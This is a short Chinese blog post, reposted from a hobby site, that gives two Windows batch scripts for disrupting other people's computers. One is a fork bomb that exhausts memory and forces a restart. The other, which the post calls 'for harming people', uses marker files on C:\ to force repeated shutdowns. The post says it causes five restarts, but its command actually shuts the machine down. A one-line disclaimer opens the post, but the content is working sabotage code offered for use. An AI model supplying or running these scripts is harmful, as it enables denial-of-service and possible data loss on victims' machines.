首先声明,不准拿去害人哦!
 
 
第一个:让别人内存OVER(逼他重启)  



@echo off  

start cmd  

%0  

就这3行了  





第二个:让对方重启指定次数(害人专用)  



@echo off  

if not exist c:\1.txt echo. >c:\1.txt & goto err1  

if not exist c:\2.txt echo. >c:\2.txt & goto err1  

if not exist c:\3.txt echo. >c:\3.txt & goto err1  

if not exist c:\4.txt echo. >c:\4.txt & goto err1  

if not exist c:\5.txt echo. >c:\5.txt & goto err1  

goto err2  

:err1  

shutdown -s -t 0  

:err2  

上面可以让对方电脑重启5次后不在重启
原创文章如转载请注明:转载自『我爱信息网http://www.52mis.com.cn/
原文链接:http://www.52mis.com.cn/post/443.html